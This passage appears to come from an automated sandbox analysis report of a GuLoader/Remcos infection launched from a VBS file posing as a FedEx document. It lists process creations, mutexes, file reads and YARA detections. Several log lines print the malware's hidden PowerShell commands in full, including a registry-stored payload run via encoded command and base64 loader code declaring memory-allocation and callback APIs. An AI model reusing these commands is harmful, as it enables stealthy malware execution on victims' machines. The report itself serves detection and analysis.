QAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsAC Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsAC Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy0zjl34.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADA2.tmp" "c:\Users\user\AppData\Local\Temp\CSCB8D22C72555343A48341CA7311A8A12.TMP"
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220121 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Grund.dat Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@28/33@4/2
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4020:120:WilError_01
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos_Mutex_Inj
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-IXYB2Q
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3120:120:WilError_01
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\775578748333_FEDEX.vbs"
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: ieinstal.pdbGCTL source: ieinstal.exe, 00000014.00000003.629851436.000000001EC11000.00000004.00000001.sdmp
Source: Binary string: ieinstal.pdb source: ieinstal.exe, 00000014.00000003.629851436.000000001EC11000.00000004.00000001.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Managementt.pdb| source: powershell.exe, 0000001D.00000002.888436421.0000000007768000.00000004.00000001.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", " -EncodedCommand "IwBhAGcAcgB5ACAAUwBjA", "", "", "0")
Yara detected GuLoader
Source: Yara match File source: 0000000C.00000002.642638940.0000000009300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.585462965.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.900361754.00000000090B0000.00000040.00000010.sdmp, type: MEMORY
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsAC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsAC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQ